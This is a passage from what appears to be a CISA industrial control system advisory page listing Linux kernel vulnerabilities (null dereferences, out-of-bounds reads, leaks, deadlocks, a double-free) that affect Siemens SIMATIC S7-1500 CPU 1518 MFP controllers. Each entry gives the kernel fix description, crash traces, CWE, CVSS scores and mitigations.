<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23397</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nfnetlink_osf: validate individual option lengths in fingerprints nfnl_osf_add_callback() validates opt_num bounds and string NUL-termination but does not check individual option length fields. A zero-length option causes nf_osf_match_one() to enter the option matching loop even when foptsize sums to zero, which matches packets with no TCP options where ctx-&gt;optp is NULL: Oops: general protection fault KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] RIP: 0010:nf_osf_match_one (net/netfilter/nfnetlink_osf.c:98) Call Trace: nf_osf_match (net/netfilter/nfnetlink_osf.c:227) xt_osf_match_packet (net/netfilter/xt_osf.c:32) ipt_do_table (net/ipv4/netfilter/ip_tables.c:293) nf_hook_slow (net/netfilter/core.c:623) ip_local_deliver (net/ipv4/ip_input.c:262) ip_rcv (net/ipv4/ip_input.c:573) Additionally, an MSS option (kind=2) with length &lt; 4 causes out-of-bounds reads when nf_osf_match_one() unconditionally accesses optp[2] and optp[3] for MSS value extraction. While RFC 9293 section 3.2 specifies that the MSS option is always exactly 4 bytes (Kind=2, Length=4), the check uses "&lt; 4" rather than "!= 4" because lengths greater than 4 do not cause memory safety issues -- the buffer is guaranteed to be at least foptsize bytes by the ctx-&gt;optsize == foptsize check. Reject fingerprints where any option has zero length, or where an MSS option has length less than 4, at add time rather than trusting these values in the packet matching hot path.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23397">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/130.html">CWE-130 Improper Handling of Length Parameter Inconsistency</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23398</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: icmp: fix NULL pointer dereference in icmp_tag_validation() icmp_tag_validation() unconditionally dereferences the result of rcu_dereference(inet_protos[proto]) without checking for NULL. The inet_protos[] array is sparse -- only about 15 of 256 protocol numbers have registered handlers. When ip_no_pmtu_disc is set to 3 (hardened PMTU mode) and the kernel receives an ICMP Fragmentation Needed error with a quoted inner IP header containing an unregistered protocol number, the NULL dereference causes a kernel panic in softirq context. Oops: general protection fault, probably for non-canonical address 0xdffffc0000000002: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017] RIP: 0010:icmp_unreach (net/ipv4/icmp.c:1085 net/ipv4/icmp.c:1143) Call Trace: icmp_rcv (net/ipv4/icmp.c:1527) ip_protocol_deliver_rcu (net/ipv4/ip_input.c:207) ip_local_deliver_finish (net/ipv4/ip_input.c:242) ip_local_deliver (net/ipv4/ip_input.c:262) ip_rcv (net/ipv4/ip_input.c:573) __netif_receive_skb_one_core (net/core/dev.c:6164) process_backlog (net/core/dev.c:6628) handle_softirqs (kernel/softirq.c:561) Add a NULL check before accessing icmp_strict_tag_validation. If the protocol has no registered handler, return false since it cannot perform strict tag validation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23398">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23414</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: tls: Purge async_hold in tls_decrypt_async_wait() The async_hold queue pins encrypted input skbs while the AEAD engine references their scatterlist data. Once tls_decrypt_async_wait() returns, every AEAD operation has completed and the engine no longer references those skbs, so they can be freed unconditionally. A subsequent patch adds batch async decryption to tls_sw_read_sock(), introducing a new call site that must drain pending AEAD operations and release held skbs. Move __skb_queue_purge(&amp;ctx-&gt;async_hold) into tls_decrypt_async_wait() so the purge is centralized and every caller -- recvmsg's drain path, the -EBUSY fallback in tls_do_decryption(), and the new read_sock batch path -- releases held skbs on synchronization without each site managing the purge independently. This fixes a leak when tls_strp_msg_hold() fails part-way through, after having added some cloned skbs to the async_hold queue. tls_decrypt_sg() will then call tls_decrypt_async_wait() to process all pending decrypts, and drop back to synchronous mode, but tls_sw_recvmsg() only flushes the async_hold queue when one record has been processed in "fully-async" mode, which may not be the case here. [pabeni@redhat.com: added leak comment]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23414">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/911.html">CWE-911 Improper Update of Reference Count</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23422</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dpaa2-switch: Fix interrupt storm after receiving bad if_id in IRQ handler Commit 31a7a0bbeb00 ("dpaa2-switch: add bounds check for if_id in IRQ handler") introduces a range check for if_id to avoid an out-of-bounds access. If an out-of-bounds if_id is detected, the interrupt status is not cleared. This may result in an interrupt storm. Clear the interrupt status after detecting an out-of-bounds if_id to avoid the problem. Found by an experimental AI code review agent at Google.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23422">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/392.html">CWE-392 Missing Report of Error Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23434</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mtd: rawnand: serialize lock/unlock against other NAND operations nand_lock() and nand_unlock() call into chip-&gt;ops.lock_area/unlock_area without holding the NAND device lock. On controllers that implement SET_FEATURES via multiple low-level PIO commands, these can race with concurrent UBI/UBIFS background erase/write operations that hold the device lock, resulting in cmd_pending conflicts on the NAND controller. Add nand_get_device()/nand_release_device() around the lock/unlock operations to serialize them against all other NAND controller access.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23434">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/820.html">CWE-820 Missing Synchronization</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23438</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: mvpp2: guard flow control update with global_tx_fc in buffer switching mvpp2_bm_switch_buffers() unconditionally calls mvpp2_bm_pool_update_priv_fc() when switching between per-cpu and shared buffer pool modes. This function programs CM3 flow control registers via mvpp2_cm3_read()/mvpp2_cm3_write(), which dereference priv-&gt;cm3_base without any NULL check. When the CM3 SRAM resource is not present in the device tree (the third reg entry added by commit 60523583b07c ("dts: marvell: add CM3 SRAM memory to cp11x ethernet device tree")), priv-&gt;cm3_base remains NULL and priv-&gt;global_tx_fc is false. Any operation that triggers mvpp2_bm_switch_buffers(), for example an MTU change that crosses the jumbo frame threshold, will crash: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 Mem abort info: ESR = 0x0000000096000006 EC = 0x25: DABT (current EL), IL = 32 bits pc : readl+0x0/0x18 lr : mvpp2_cm3_read.isra.0+0x14/0x20 Call trace: readl+0x0/0x18 mvpp2_bm_pool_update_fc+0x40/0x12c mvpp2_bm_pool_update_priv_fc+0x94/0xd8 mvpp2_bm_switch_buffers.isra.0+0x80/0x1c0 mvpp2_change_mtu+0x140/0x380 __dev_set_mtu+0x1c/0x38 dev_set_mtu_ext+0x78/0x118 dev_set_mtu+0x48/0xa8 dev_ifsioc+0x21c/0x43c dev_ioctl+0x2d8/0x42c sock_ioctl+0x314/0x378 Every other flow control call site in the driver already guards hardware access with either priv-&gt;global_tx_fc or port-&gt;tx_fc. mvpp2_bm_switch_buffers() is the only place that omits this check. Add the missing priv-&gt;global_tx_fc guard to both the disable and re-enable calls in mvpp2_bm_switch_buffers(), consistent with the rest of the driver.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23438">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23439</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: udp_tunnel: fix NULL deref caused by udp_sock_create6 when CONFIG_IPV6=n When CONFIG_IPV6 is disabled, the udp_sock_create6() function returns 0 (success) without actually creating a socket. Callers such as fou_create() then proceed to dereference the uninitialized socket pointer, resulting in a NULL pointer dereference. The captured NULL deref crash: BUG: kernel NULL pointer dereference, address: 0000000000000018 RIP: 0010:fou_nl_add_doit (net/ipv4/fou_core.c:590 net/ipv4/fou_core.c:764) [...] Call Trace: genl_family_rcv_msg_doit.constprop.0 (net/netlink/genetlink.c:1114) genl_rcv_msg (net/netlink/genetlink.c:1194 net/netlink/genetlink.c:1209) [...] netlink_rcv_skb (net/netlink/af_netlink.c:2550) genl_rcv (net/netlink/genetlink.c:1219) netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344) netlink_sendmsg (net/netlink/af_netlink.c:1894) __sock_sendmsg (net/socket.c:727 (discriminator 1) net/socket.c:742 (discriminator 1)) __sys_sendto (./include/linux/file.h:62 (discriminator 1) ./include/linux/file.h:83 (discriminator 1) net/socket.c:2183 (discriminator 1)) __x64_sys_sendto (net/socket.c:2213 (discriminator 1) net/socket.c:2209 (discriminator 1) net/socket.c:2209 (discriminator 1)) do_syscall_64 (arch/x86/entry/syscall_64.c:63 (discriminator 1) arch/x86/entry/syscall_64.c:94 (discriminator 1)) entry_SYSCALL_64_after_hwframe (net/arch/x86/entry/entry_64.S:130) This patch makes udp_sock_create6 return -EPFNOSUPPORT instead, so callers correctly take their error paths. There is only one caller of the vulnerable function and only privileged users can trigger it.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23439">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23446</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: usb: aqc111: Do not perform PM inside suspend callback syzbot reports "task hung in rpm_resume" This is caused by aqc111_suspend calling the PM variant of its write_cmd routine. The simplified call trace looks like this: rpm_suspend() usb_suspend_both() - here udev-&gt;dev.power.runtime_status == RPM_SUSPENDING aqc111_suspend() - called for the usb device interface aqc111_write32_cmd() usb_autopm_get_interface() pm_runtime_resume_and_get() rpm_resume() - here we call rpm_resume() on our parent rpm_resume() - Here we wait for a status change that will never happen. At this point we block another task which holds rtnl_lock and locks up the whole networking stack. Fix this by replacing the write_cmd calls with their _nopm variants</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23446">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/833.html">CWE-833 Deadlock</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23449</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: teql: Fix double-free in teql_master_xmit Whenever a TEQL devices has a lockless Qdisc as root, qdisc_reset should be called using the seq_lock to avoid racing with the datapath. Failure to do so may cause crashes like the following: [ 238.028993][ T318] BUG: KASAN: double-free in skb_release_data (net/core/skbuff.c:1139) [ 238.029328][ T318] Free of addr ffff88810c67ec00 by task poc_teql_uaf_ke/318 [ 238.029749][ T318] [ 238.029900][ T318] CPU: 3 UID: 0 PID: 318 Comm: poc_teql_ke Not tainted 7.0.0-rc3-00149-ge5b31d988a41 #704 PREEMPT(full) [ 238.029906][ T318] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 238.029910][ T318] Call Trace: [ 238.029913][ T318] [ 238.029916][ T318] dump_stack_lvl (lib/dump_stack.c:122) [ 238.029928][ T318] print_report (mm/kasan/report.c:379 mm/kasan/report.c:482) [ 238.029940][ T318] ? skb_release_data (net/core/skbuff.c:1139) [ 238.029944][ T318] ? srso_alias_return_thunk (arch/x86/lib/retpoline.S:221) ... [ 238.029957][ T318] ? skb_release_data (net/core/skbuff.c:1139) [ 238.029969][ T318] kasan_report_invalid_free (mm/kasan/report.c:221 mm/kasan/report.c:563) [ 238.029979][ T318] ? skb_release_data (net/core/skbuff.c:1139) [ 238.029989][ T318] check_slab_allocation (mm/kasan/common.c:231) [ 238.029995][ T318] kmem_cache_free (mm/slub.c:2637 (discriminator 1) mm/slub.c:6168 (discriminator 1) mm/slub.c:6298 (discriminator 1)) [ 238.030004][ T318] skb_release_data (net/core/skbuff.c:1139) ... [ 238.030025][ T318] sk_skb_reason_drop 